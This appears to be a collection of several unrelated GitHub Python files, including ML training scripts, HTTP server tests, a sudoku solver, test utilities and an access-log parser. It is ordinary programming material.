y[idx:]\n logger.info(\"length train: {} and length valid: {}\".format(len(X_train), len(X_valid)))\n return (X_train, y_train), (X_valid, y_valid)\n\n # take text input data in a dataframe, return batches of vectors\n @threadsafe_generator\n def data_to_batch_generator(self, X, y=None, shuffle=False, embedding_model=None, batch_size=32, len_padding=100):\n while True:\n if shuffle:\n if y is not None:\n X, y = sklearn.utils.shuffle(X, y)\n else:\n raise Exception(\"if you shuffle X without y you will not be able to get the order for y\")\n\n for i in range(0, len(X), batch_size):\n batch = X[i:(i + batch_size)]\n\n if batch_size > len(X):\n raise RuntimeError(\"Impossible to compute a batch size greater than the size of data\")\n # TODO: find a way to include last the last batch which has a different size\n # if (i + batch_size) > len(X):\n # logger.warn(\"Taking random rows to complete last batch\")\n # idx = np.random.randint(len(X), size=(i+batch_size) - len(X))\n # batch = pd.concat([X[i:(i + batch_size)], X[idx]], axis=0)\n\n if type(embedding_model) is gensim.models.word2vec.Word2Vec:\n batch = np.array(batch.apply(lambda sent: self.sentence_to_word2vec_embedding(embedding_model, sent)))\n elif type(embedding_model) is keras.preprocessing.text.Tokenizer:\n if batch_size == 1:\n raise NotImplementedError(\"If you do not use word2vec, take a batch size greater than 1\")\n batch = embedding_model.texts_to_sequences(batch)\n else:\n # Todo find a way to add new embedding models\n raise NotImplementedError('Need to implement behavior when no embedding or other embedings')\n pass\n if len_padding is not None:\n batch = pad_sequences(batch, maxlen=len_padding, dtype=np.float32,\n padding='pre', truncating='post')\n\n if y is not None:\n batch_labels = y[i:(i + batch_size)]\n yield batch, batch_labels\n else:\n yield batch\n\n\nif __name__ == '__main__':\n for W2V in [True, False]:\n df = pd.DataFrame([['bonjour je avoir un problème ici', \"team1\"],\n ['nous aller le réosudre de ici là', \"team2\"],\n [\"nous vouloir améliorer\", \"team1\"],\n [\"je être maintenant devant un problème\", \"team3\"]], columns=[\"Text\", \"Team\"])\n print(df)\n X = df.Text\n y = df.Team\n tp = TeamPipeline()\n y, encoder = tp.encode_label(y, categorical=True)\n (X_train, y_train), (X_valid, y_valid) = tp.train_valid_split(X, y)\n\n if W2V:\n embedding_model, fname_embedding = tp.get_word2vec_model(X_train, size=3, window=2,\n min_count=0)\n else:\n embedding_model, fname_embedding = tp.get_tokenizer(X_train)\n\n gen = tp.data_to_batch_generator(X_train, y_train, shuffle=True, embedding_model=embedding_model,\n batch_size=32, len_padding=10)\n\n for i in gen:\n print(i)\n print(i[0].shape)\n break\n","repo_name":"turpaultn/Text_classification","sub_path":"Code/Pipeline.py","file_name":"Pipeline.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21019502085","text":"import os\nimport subprocess\nimport socket\nimport time\nimport httplib\nimport json\nfrom . import start_process_server, start_data_server, stop_server\n\ntest_vars = {}\n\ndef setup():\n# (po, fo_out, fo_err) = start_data_server()\n# test_vars['data_po'] = po\n# test_vars['data_fo_out'] = fo_out\n# test_vars['data_fo_err'] = fo_err\n (po, fo_out, fo_err) = start_process_server()\n test_vars['process_po'] = po\n test_vars['process_fo_out'] = fo_out\n test_vars['process_fo_err'] = fo_err\n return\n\ndef teardown():\n# stop_server(test_vars['data_po'], \n# test_vars['data_fo_out'], \n# test_vars['data_fo_err'])\n stop_server(test_vars['process_po'], \n test_vars['process_fo_out'], \n test_vars['process_fo_err'])\n return\n\nclass BaseProcessTest:\n\n \"\"\"base class for process tests\"\"\"\n\n n_data_connections = 0\n n_process_connections = 0\n\n def setUp(self):\n \"\"\"set up each test\"\"\"\n self.data_connections = []\n self.process_connections = []\n self.next_data_connection = 0\n self.next_process_connection = 0\n for i in xrange(self.n_data_connections):\n c = httplib.HTTPConnection('localhost', 8080)\n self.data_connections.append(c)\n for i in xrange(self.n_process_connections):\n c = httplib.HTTPConnection('localhost', 8081)\n self.process_connections.append(c)\n return\n\n def tearDown(self):\n \"\"\"clean up after each test\"\"\"\n for i in xrange(self.n_data_connections):\n self.data_connections[i].close()\n for i in xrange(self.n_process_connections):\n self.process_connections[i].close()\n return\n\n def data_request(self, *args):\n hc = self.data_connections[self.next_data_connection]\n self.next_data_connection += 1\n hc.request(*args)\n return hc.getresponse()\n\n def process_request(self, *args):\n hc = self.process_connections[self.next_process_connection]\n self.next_process_connection += 1\n hc.request(*args)\n return hc.getresponse()\n\nclass TestGetRoot(BaseProcessTest):\n\n n_process_connections = 3\n\n def test(self):\n r = self.process_request('GET', '/')\n r.status = 200\n r.reason = 'OK'\n assert ' wc' in r.read()\n return\n\n def test_accept(self):\n r = self.process_request('GET', '/', '', {'Accept': 'application/json'})\n r.status = 200\n r.reason = 'OK'\n data = r.read()\n try:\n obj = json.loads(data)\n except:\n self.fail('returned data was not json')\n assert isinstance(obj, dict)\n assert 'wc' in obj\n return\n\n def test_accept_bad(self):\n r = self.process_request('GET', '/', '', {'Accept': 'ctmaj/ctmin'})\n r.status = 406\n r.reason = 'Not Acceptable'\n assert r.read() == ''\n return\n\nclass Test404(BaseProcessTest):\n\n n_process_connections = 1\n\n def test(self):\n r = self.process_request('GET', '/thisshouldnotexist')\n r.status = 404\n r.reason = 'Not Found'\n return\n\nclass TestPostGetDelete(BaseProcessTest):\n\n n_process_connections = 4\n\n def test(self):\n\n headers = {'Content-Type': 'text/plain'}\n r = self.process_request('POST', '/echo', 'data', headers)\n assert r.status == 201\n assert r.reason == 'Created'\n headers = dict(r.getheaders())\n assert 'content-length' in headers\n assert headers['content-length'] == '0'\n assert 'location' in headers\n ident = headers['location'].split('/')[-1]\n assert r.read() == ''\n\n r = self.process_request('GET', '/job/%s' % ident)\n assert r.status == 200\n assert r.reason == 'OK'\n headers = dict(r.getheaders())\n assert 'content-length' in headers\n try:\n content_length = int(headers['content-length'])\n except ValueError:\n self.fail('content-length is not an integer')\n assert len(r.read()) == content_length\n\n r = self.process_request('DELETE', '/job/%s' % ident)\n assert r.status == 204\n assert r.reason == 'No Content'\n assert r.read() == ''\n\n r = self.process_request('GET', '/job/%s' % ident)\n assert r.status == 410\n assert r.reason == 'Gone'\n headers = dict(r.getheaders())\n assert 'content-length' in headers\n try:\n content_length = int(headers['content-length'])\n except ValueError:\n self.fail('content-length is not an integer')\n assert content_length == 0\n assert r.read() == ''\n\n return\n\nclass TestValidator(BaseProcessTest):\n\n \"\"\"test that a handler's validation presents correctly on the front end\"\"\"\n\n n_process_connections = 3\n\n def test_okay(self):\n headers = {'Content-Type': 'text/plain'}\n data = 'http://localhost:8081/'\n r = self.process_request('POST', '/wc', data, headers)\n assert r.status == 201\n assert r.reason == 'Created'\n return\n\n def test_bad_content_type(self):\n headers = {'Content-Type': 'application/json'}\n data = 'http://localhost:8081/'\n r = self.process_request('POST', '/wc', data, headers)\n assert r.status == 415\n assert r.reason == 'Unsupported Media Type'\n return\n\n def test_bad_request(self):\n headers = {'Content-Type': 'text/plain'}\n r = self.process_request('POST', '/wc', 'bogus', headers)\n assert r.status == 400\n assert r.reason == 'Bad Request'\n return\n\n# eof\n","repo_name":"chaselgrove/dpf","sub_path":"tests/test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33996000082","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# 查看当前挂载的数据集目录, 该目录下的变更重启环境后会自动还原\n# View dataset directory. \n# This directory will be recovered automatically after resetting environment. \nget_ipython().system('ls /home/aistudio/data')\n\n\n# In[ ]:\n\n\n# 查看工作区文件, 该目录下的变更将会持久保存. 请及时清理不必要的文件, 避免加载过慢.\n# View personal work directory. \n# All changes under this directory will be kept even after reset. \n# Please clean unnecessary files in time to speed up environment loading. \nget_ipython().system('ls /home/aistudio/work')\n\n\n# In[ ]:\n\n\n# 如果需要进行持久化安装, 需要使用持久化路径, 如下方代码示例:\n# If a persistence installation is required, \n# you need to use the persistence path as the following: \nget_ipython().system('mkdir /home/aistudio/external-libraries')\nget_ipython().system('pip install beautifulsoup4 -t /home/aistudio/external-libraries')\n\n\n# In[ ]:\n\n\n# 同时添加如下代码, 这样每次环境(kernel)启动的时候只要运行下方代码即可: \n# Also add the following code, \n# so that every time the environment (kernel) starts, \n# just run the following code: \nimport sys \nsys.path.append('/home/aistudio/external-libraries')\n\n\n# # 解压数据集\n\n# In[ ]:\n\n\nget_ipython().system('unzip -oq /home/aistudio/data/data35499/minist数据集.zip')\n\n\n# In[ ]:\n\n\nimport paddle\nimport numpy as np\nfrom PIL import Image\nimport os\nfrom matplotlib import pyplot as plt \n\n\n# In[ ]:\n\n\nroot = \"train_labs_black_background.txt\"\nf1 = open(root)\nlabels = f1.readlines()\nlabel = {}\nfor i in range(55000-1):\n label[str(int(labels[i][0:-2]))] = int(labels[i][-2])\nlabel[\"54999\"] = 8\n\n\n# In[ ]:\n\n\n# 预览图像\ntrain_image_files = os.listdir(\"train_black_background\")\nprint(train_image_files[6])\nimg = Image.open(\"train_black_background\"+\"/\"+train_image_files[6])\nprint(img) # 1*28*28\nplt.imshow(img)\n\n\n# In[ ]:\n\n\n# 构建网络\nclass Net(paddle.nn.Layer):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = paddle.nn.Linear(in_features=1*28*28, out_features=128)\n self.fc2 = paddle.nn.Linear(in_features=128, out_features=10)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n# 实例化\nnet = Net()\n# 定义损失函数\nloss_func = paddle.nn.CrossEntropyLoss()\n# 定义优化器\nopt = paddle.optimizer.SGD(parameters=net.parameters())\n\ntrain_white_image_files = os.listdir(\"train_white_background\")\ntrain_black_image_files = os.listdir(\"train_black_background\")\ntrain_image_files = train_white_image_files+train_black_image_files\nprint(train_black_image_files[10:20])\n\n\n# 模型结构为全连接\n# \n# 学习率lr_schedule为0.001\n# \n# optimize为随机梯度下降优化器\n# \n# epoch为10\n# \n# \n# batch_size为1\n# \n# Loss function为交叉熵\n# \n\n# In[7]:\n\n\n#组件训练程序\nfor epoch in range(10):\n for img_id in range(len(train_black_image_files)):\n img_name = f\"{img_id}.png\"\n _img = Image.open(\"train_black_background\"+\"/\"+img_name)\n _img = np.array(_img).astype(\"float32\").flatten() / 255\n _img = paddle.to_tensor([_img], dtype=\"float32\")\n _label = label[str(img_id)]\n _label = paddle.to_tensor([_label], dtype=\"int64\")\n\n number_prob = net(_img)\n loss = loss_func(number_prob, _label)\n loss.backward()\n opt.step()\n opt.clear_gradients()\n print(f\"Epoch: {epoch}\\t loss: {loss.numpy()}\")\n\n#保存模型\npaddle.save(net.state_dict(), \"param\")\n\n\n# # 可视化模型效果\n\n# In[9]:\n\n\n# 可视化模型效果\nnet.set_dict(paddle.load(\"param\"))\n_img = Image.open(\"test_black_background\"+\"/\"+\"240.png\")\nplt.imshow(_img)\n_img = np.array(_img).astype(\"float32\").flatten() / 255\n_img = paddle.to_tensor([_img], dtype=\"float32\")\ninfer_number = net(_img)\nprint(\"240.png的预测结果为\",paddle.nn.functional.softmax(infer_number).numpy()) # 使用激活函数使概率分布与0到1之间\nprint(\"最大概率为\",np.argmax(infer_number.numpy()[0]))\n\n","repo_name":"lyf666tujc/-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"39461520695","text":"\"\"\"\nUtilities for test functions\n\nThis code assumes that the namespace that python based tests are in is correctly assigned, otherwise global\nvariables won't be present and this will throw errors\n\n\"\"\"\nfrom __future__ import print_function, absolute_import, division\nimport time\nimport contextlib\nimport sys\nfrom gsmodutils.utils import StringIO\n\n\nclass ModelTestSelector(object):\n \n def __init__(self, models=None, conditions=None, designs=None):\n \"\"\"\n For each parameter set run the test function with these models and save results accordingly\n \n This approach allows the reuse of test functions with multiple conditions/design parameters\n \n This \n \n Default functionality, when using the decorator, is to perfom the test on all models and under default\n conditions.\n \n Designs and conditions will never be loaded unless specified\n \n Without this decorator, the test function would run once\n \n usage as a decorator:\n\n from gsmodutils.testutitls import ModelTestSelector\n @ModelTestSelector(models=['model2'], conditions=['condtion_a'], designs=['a'])\n def test_func(model, project, log):\n log.assert(True, \"Works\", \"Does not work\". \"Test\")\n \"\"\"\n\n if models is None:\n models = []\n\n if conditions is None:\n conditions = []\n\n if designs is None:\n designs = []\n\n self.models = models\n self.conditions = conditions\n self.designs = designs\n\n def __call__(self, func):\n \"\"\"\n Repeatedly calls function with modfied parameters\n requires functions to have the standard form of arguments\n \"\"\"\n func._is_test_selector = True\n func.models = self.models\n func.conditions = self.conditions\n func.designs = self.designs\n \n return func\n\n\nclass ResultRecord(object):\n \"\"\"\n Class for handling logging of errors in tester\n follows a hierarchical pattern as log records allow child records\n This is a bit of a weird data structure but the objective is to (in a future version) encapsulate all tests inside\n an instance of Test Record\n \"\"\"\n def __init__(self, tid='', parent=None, param_child=False):\n self.id = tid\n self.parent = parent\n self.success = []\n self.error = []\n self.warnings = []\n self.std_out = None # Reserved for messages\n self.run_time = time.time()\n self.children = {}\n # tells us if this is a parameter varaiation of parent (i.e. as low a level as the logs should get)\n self.param_child = param_child\n \n def assertion(self, statement, success_msg, error_msg, desc=''):\n \"\"\"\n Called within test functions to store errors and successes\n Results will be appended to the correct log reccords\n \"\"\"\n desc = dict(\n desc=desc,\n ex_time=time.time()\n )\n if statement:\n self.success.append((success_msg, desc))\n else:\n self.error.append((error_msg, desc))\n\n def warning(self, statement, message, desc=''):\n \"\"\"\n Called within test functions to capture warnings about the status of models.\n If statement is true, the warning message will be stored.\n \"\"\"\n if statement:\n self.warnings.append((message, desc))\n \n def add_error(self, msg, desc=''):\n \"\"\"\n For errors loading tests, e.g. success cases can't be reached because the model doesn't load or can't get a\n feasable solution\n \"\"\"\n desc = dict(\n desc=desc,\n ex_time=time.time()\n )\n self.error.append((msg, desc))\n \n def create_child(self, new_id, param_child=False):\n \"\"\"\n Used within decorator helper functions to allow multiple tests with the same function but where other parameters\n change\n \"\"\"\n if self.param_child:\n raise TypeError('Parameter variations should not have child logs')\n \n newlog = ResultRecord(new_id, parent=self, param_child=param_child)\n self.children[new_id] = newlog\n return newlog\n \n @property\n def is_success(self):\n \"\"\"\n The test function is considered a failure if there are one or more error logs\n \"\"\"\n if len([x for x in self.children.values() if not x.is_success]) + len(self.error):\n return False\n return True\n\n @property\n def log_count(self):\n \"\"\" count total errors for self and children \"\"\"\n total = len(self.success) + len(self.error)\n error = len(self.error)\n \n for child in self.children.values():\n ct, ce = child.log_count\n error += ce\n total += ct\n \n return total, error\n\n def to_dict(self, stk=None):\n \"\"\"\n converts log into dictionary form for portability\n stk stops cyclic behaviour\n \"\"\"\n if stk is None:\n stk = []\n\n children = {}\n for child in self.children.values():\n if child.id not in stk:\n children[str(child.id)] = child.to_dict(stk=stk + [self.id])\n \n result = dict(\n id=str(self.id),\n children=children,\n error=self.error,\n success=self.success,\n is_success=self.is_success,\n run_time=self.run_time,\n )\n return result\n\n\n@contextlib.contextmanager\ndef stdout_ctx(stdout=None):\n \"\"\"\n Context to capture standard output of python executed tests during run time\n This is displayed to the user for them to see after the tests are run\n \"\"\"\n old = sys.stdout\n if stdout is None:\n stdout = StringIO()\n sys.stdout = stdout\n yield stdout\n sys.stdout = old\n\n\nclass ModelLoader(object):\n\n def __init__(self, project, model_id, conditions_id, design_id):\n \"\"\"\n Simple callback interface to load a model\n :param project: gsmodutils project\n :param model_id: model id within project\n :param conditions_id: mcondtions id within project\n :param design_id: design id within project\n \"\"\"\n self.project = project\n self.model_id = model_id\n self.conditions_id = conditions_id\n self.design_id = design_id\n\n def load(self, log):\n mdl = self.project.load_model(self.model_id)\n if self.conditions_id is not None:\n try:\n self.project.load_conditions( self.conditions_id, model=mdl)\n except IOError as e:\n log.add_error(\"conditions {} not found\".format(self.conditions_id), str(e))\n return None\n\n if self.design_id is not None:\n try:\n self.project.load_design(self.design_id, model=mdl)\n except IOError as e:\n log.add_error(\"design {} not found\".format(self.design_id), str(e))\n return None\n\n return mdl\n","repo_name":"SBRCNottingham/gsmodutils","sub_path":"gsmodutils/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"21563379606","text":"from turtle import shape\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nimport random\r\n\r\n\r\ndef data(w:torch.Tensor,b,sample_number):\r\n x = torch.normal(0,1,(sample_number,w.shape[0]))\r\n y = torch.matmul(x,w) + b + torch.normal(0,0.01,(sample_number,))\r\n return x,y\r\n\r\ndef get_sample(features,labels,batch_size):\r\n indices = list(range(0,len(labels)))\r\n random.shuffle(indices) # 打乱下标顺序,直接对源数据进行修改\r\n for i in range(0,len(labels),batch_size):\r\n index = indices[i:min(i+batch_size,len(labels))]\r\n yield features[index],labels[index]\r\n\r\nw = torch.tensor([2,-3.4])\r\nb = 4.2\r\nfeatures,labels = data(w,b,1000)\r\n\r\n\r\nbatch_size = 10\r\nw = torch.normal(0,0.01,(2,),requires_grad=True)\r\nb = torch.normal(0,0.01,(1,),requires_grad=True)\r\n\r\n\r\ndef linear_regression(x,w,b):\r\n return torch.matmul(x,w)+b\r\n\r\n\r\ndef square_loss_function(y_hat,y):\r\n return 0.5*(y_hat-y)**2\r\n\r\ndef sgd(params,lr,batch_size):\r\n with torch.no_grad():\r\n for param in params:\r\n # param = param - lr/batch_size*param.grad 会导致 param.grad消失\r\n # https://blog.csdn.net/yinizhilianlove/article/details/104033592\r\n param -= lr/batch_size*param.grad \r\n param.grad.zero_()\r\nlr = 0.03 # 学习率\r\nepochs = 10 # 学习轮数\r\nnet = linear_regression # 网络结构,这里就是一个线性回归模型\r\nloss = square_loss_function # 损失函数\r\nbatch_size\r\n\r\nfor epoch in range(epochs):\r\n for X,y in get_sample(features,labels,batch_size):\r\n y_hat = net(X,w,b)\r\n l = loss(y_hat,y)\r\n l.sum().backward() # 反向传播,然后才能计算w、b的梯度\r\n sgd([w,b],lr,batch_size)\r\n with torch.no_grad():\r\n l = loss(net(features,w,b),labels)\r\n print(f\"epoch:{epoch}, loss: {l.mean()}, w: {w[0],w[1]}, b: {b[0]}\")\r\n \r\n ","repo_name":"whr819987540/whu_linux","sub_path":"fl/3/线性回归/2-线性回归/线性回归.py","file_name":"线性回归.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11384632245","text":"# @param A : list of list of chars\ndef solveSudoku(A):\n\n for i in range(len(A)):\n A[i] = list(A[i])\n \n rows = [[False for j in range(9)] for i in range(9)]\n columns = [[False for j in range(9)] for i in range(9)]\n grids = [[False for j in range(9)] for i in range(9)]\n \n for i in range(9):\n for j in range(9):\n if A[i][j] == '.':\n continue\n else:\n num = int(A[i][j])\n rows[i][num-1] = True\n columns[j][num-1] = True\n grid = (i//3)*3 + (j//3)\n grids[grid][num-1] = True\n\n def is_safe(row, col, num, rows, columns, grids):\n grid = (row//3)*3 + (col//3)\n if (rows[row][num-1]) or (columns[col][num-1]) or (grids[grid][num-1]):\n return False\n rows[row][num-1] = True\n columns[col][num-1] = True\n grids[grid][num-1] = True\n return True\n \n def fill_sudoku(A, n, rows, columns, grids): \n for row in range(n):\n for col in range(n):\n if A[row][col] != '.':\n print('row: ', row)\n print('col: ', col)\n print('---------------------------------------')\n continue\n for i in range(1, 10):\n grid = (row//3)*3 + (col//3)\n if is_safe(row, col, i, rows, columns, grids):\n A[row][col] = i\n if fill_sudoku(A, n, rows, columns, grids):\n return True\n A[row][col] = '.'\n rows[row][i-1] = False\n columns[col][i-1] = False\n grids[grid][i-1] = False\n return False\n return True\n \n fill_sudoku(A, 9, rows, columns, grids)\n return A\n\nA = [[5,3,'.','.',7,'.','.','.','.'], [6,'.','.',1,9,5,'.','.','.'], ['.',9,8,'.','.','.','.',6,'.'], [8,'.','.','.',6,'.','.','.',3], [4,'.','.',8,'.',3,'.','.',1], [7,'.','.','.','2','.','.','.',6], ['.',6,'.','.','.','.',2,8,'.'], ['.','.','.',4,1,9,'.','.',5], ['.','.','.','.',8,'.','.',7,9]]\nA = solveSudoku(A)\nprint(A)","repo_name":"KiranACD/dsa-python","sub_path":"Backtracking/solve_sudoku.py","file_name":"solve_sudoku.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"9818102631","text":"import numpy as np\n\nnp.random.seed(1337)\n\nimport keras\nfrom model import Model, plot_accuracy, plot_loss\nimport argparse\nfrom argparse import Namespace\nimport os\nimport csv\nimport httplib2\nfrom datetime import datetime\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\nfrom data import load_data\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/sheets.googleapis.com-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/spreadsheets'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Machine Learning Coursework 2'\n\n\ndef get_credentials(flags):\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'sheets.googleapis.com-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n flags.noauth_local_webserver = True\n credentials = tools.run_flow(flow, store, flags)\n print('Storing credentials to ' + credential_path)\n\n return credentials\n\n\ndef report_local(params, loss, accuracy):\n if loss == \"nan\":\n return\n\n print(\"reporting:\\n\\tparams={}\\n\\tloss:{}\\n\\taccuracy\".format(params, loss, accuracy))\n\n with open(\"./results/results-{}.csv\".format(params.timestamp), \"a+\") as csvfile:\n writer = csv.writer(csvfile)\n values = [\n str(datetime.now()),\n str(params.loss),\n str(params.hidden_activation),\n str(params.output_activation),\n str(params.weight_initialisation),\n str(params.epochs),\n str(params.batch_size),\n str(params.lr),\n str(params.lr_scheduler),\n str(params.decay_rate),\n str(params.early_stopping_patience),\n str(params.dropout_first),\n str(params.dropout_second),\n str(params.momentum),\n str(params.l1),\n str(params.l2),\n str(loss),\n str(accuracy)\n ]\n\n writer.writerow(values)\n print(\", \".join(values))\n\n\ndef report_run(params, loss, accuracy):\n credentials = get_credentials(params)\n http = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\n service = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n\n spreadsheet_id = '1tx0n4QN-tzjZNfqvqi74hs3RHHkRb5tZ2AxS4xMIxY0'\n range_name = 'Sheet1'\n\n service.spreadsheets().values().append(\n spreadsheetId=spreadsheet_id,\n range=range_name,\n valueInputOption=\"USER_ENTERED\",\n body={\n 'values': [[\n str(datetime.now()),\n ', '.join(map(str, params.hidden_layer_neurons)),\n params.loss,\n params.hidden_activation,\n params.output_activation,\n params.weight_initialisation,\n params.epochs,\n params.batch_size,\n params.lr,\n params.lr_decay,\n params.momentum,\n loss,\n accuracy\n ]]\n }).execute()\n\n\ndef train_and_report(training_data, validation_data, params):\n model = Model(training_data, validation_data, params)\n model.build()\n history = model.train(epochs=params.epochs, batch_size=params.batch_size)\n\n loss, accuracy = model.evaluate()\n report_local(params, loss, accuracy)\n\n return history, model\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n description='Run model with given arguments.',\n parents=[tools.argparser])\n\n parser.add_argument('--data', type=str, default='data4students.mat')\n parser.add_argument('--lr', type=float, default=0.207)\n parser.add_argument('--lr_scheduler', type=str, default='exponential_decay')\n parser.add_argument('--decay_rate', type=float, default=0.37293)\n parser.add_argument('--momentum', type=float, default=0.5)\n parser.add_argument('--epochs', type=int, default=1000)\n parser.add_argument('--batch_size', type=int, default=128)\n parser.add_argument('--hidden_activation', type=str, default='relu')\n parser.add_argument('--output_activation', type=str, default='softmax')\n parser.add_argument('--weight_initialisation', type=str, default='random_uniform')\n parser.add_argument('--loss', type=str, default='categorical_crossentropy')\n parser.add_argument('--timestamp', type=str, default='test')\n parser.add_argument('--early_stopping_patience', type=int, default=3)\n parser.add_argument('--dropout_first', type=float, default=0.08077)\n parser.add_argument('--dropout_second', type=float, default=0.24986)\n parser.add_argument('--l1', type=float, default=0.0)\n parser.add_argument('--l2', type=float, default=0.0)\n\n return parser\n\n\ndef confusion_matrix(testing_data, predictions):\n matrix = np.zeros((7, 7), dtype=int)\n\n # Compute confusion matrix\n for i, predicted_label in enumerate(predictions):\n expected_label = testing_data.targets[i].argmax(-1)\n matrix[expected_label, predicted_label] += 1\n\n # Rows are actual labels, columns are predicted labels\n predicted_sums = np.sum(matrix, axis=0)\n actual_sums = np.sum(matrix, axis=1)\n\n print(\"Confusion matrix:\")\n print(matrix)\n\n for i in range(7):\n true_positives = matrix[i, i]\n false_positives = predicted_sums[i] - true_positives\n false_negatives = actual_sums[i] - true_positives\n\n recall = true_positives / (true_positives + false_negatives)\n precision = true_positives / (true_positives + false_positives)\n f1 = 2 * (precision * recall) / (precision + recall)\n\n print(\"Statistics for emotion \" + str(i) + \":\")\n print(\"Recall: \" + str(recall))\n print(\"Precision: \" + str(precision))\n print(\"F1: \" + str(f1))\n print()\n\n\ndef main():\n parser = get_parser()\n params = parser.parse_args()\n\n training_data, testing_data, validation_data = load_data(params.data)\n\n history, model = train_and_report(training_data, validation_data, params)\n plot_accuracy(history)\n plot_loss(history)\n\n print(testing_data.data[0])\n predictions = model.model.predict(testing_data.data).argmax(-1)\n\n confusion_matrix(testing_data, predictions)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Thopiax/mlads-neural-networks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35769213244","text":"'''\n Escreva um programa que leia um número inteiro\nqualquer e peça para o usuário escolher qual será\na base de conversão:\n\n1 - para binário\n2 - para octal\n3 - para hexadecimal\n'''\nnum = int(input('Digite um número: '))\nprint('''\nEscolha a base de conversão:\n1 - binário\n2 - octal\n3 - hexadecimal\n''')\nopcao = int(input('Sua opção: '))\n\nif opcao == 1:\n print(f'{num} em binário é {bin(num)[2:]}')\nelif opcao == 2:\n print(f'{num} em octal é {oct(num)[2:]}')\nelif opcao == 3:\n print(f'{num} em decimal é {hex(num)[2:]}')\nelse:\n print('Opção inválida.')","repo_name":"thomillaz/exercicios-py","sub_path":"curso em video II/aula12-desafio37.py","file_name":"aula12-desafio37.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32547765950","text":"import datetime\nfrom clfparser import CLFParser\nimport operator\n\n# def tail(file, n=1, bs=1024):\n# f = open(file)\n# f.seek(0,2)\n# l = 1-f.read(1).count('\\n')\n# B = f.tell()\n# while n >= l and B > 0:\n# block = min(bs, B)\n# B -= block\n# f.seek(B, 0)\n# l += f.read(block).count('\\n')\n# f.seek(B, 0)\n# l = min(l,n)\n# lines = f.readlines()[-l:]\n# f.close()\n# return lines\n\nURLS_TO_EXCLUDE = [\"/sitenews/rss/\",\n \"/favicon.ico/\"]\n\ndef webpage_url_filter(url):\n return True if url[-1] == \"/\" and url not in URLS_TO_EXCLUDE else False\n\ndef retrieve_log(filename):\n with open(filename, \"r\") as f:\n content = f.readlines()\n return [CLFParser.logDict(l) for l in content]\n\ndef filter_log_to_get_ip_urls(records, cutoff_time):\n return [r['r'].split(\" \")[1] for r in records\n if r['h'] != '-' and\n r['r'][0:4] == '\"GET'and\n isinstance(r['time'], datetime.date) and\n r['time'] > cutoff_time]\n\ndef pages_by_popularity(filename, cutoff_time, url_filter):\n records = retrieve_log(filename)\n kept = filter(url_filter,\n filter_log_to_get_ip_urls(records, cutoff_time))\n urls = {}\n for item in kept:\n if item in urls:\n urls[item] = urls[item] + 1\n else:\n urls[item] = 1\n most_pop = sorted(urls.items(), key=operator.itemgetter(1), reverse=True)\n return most_pop\n\ndef most_popular_pages(filename, cutoff_time, num=5, url_filter=None):\n return pages_by_popularity(filename, cutoff_time, url_filter)[0:num]\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='Get most popular pages')\n parser.add_argument('--logfile', type=str, default=\"access.log\")\n parser.add_argument('--date', type=str, default=\"\")\n parser.add_argument('--diff', type=int, default=10)\n parser.add_argument('--num', type=int, default=5)\n parser.add_argument('--stdfilter', type=bool, default=True)\n parser.add_argument('--filter', dest='stdfilter', action='store_true')\n parser.add_argument('--no-filter', dest='stdfilter', action='store_false')\n parser.set_defaults(stdfilter=True)\n options = parser.parse_args()\n\n if options.date == \"\":\n cutoff_time = datetime.datetime.now() - \\\n datetime.timedelta(minutes=options.diff)\n else:\n cutoff_time = datetime.datetime.strptime(options.date,\n '%Y-%m-%d %H:%M:%S')\n if options.stdfilter:\n url_filter = webpage_url_filter\n else:\n url_filter = None\n pages = most_popular_pages(options.logfile, cutoff_time,\n options.num, url_filter)\n for k,v in pages:\n print(k, v)\n","repo_name":"groundupnews/gu","sub_path":"analyzer/top_urls.py","file_name":"top_urls.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"34"} 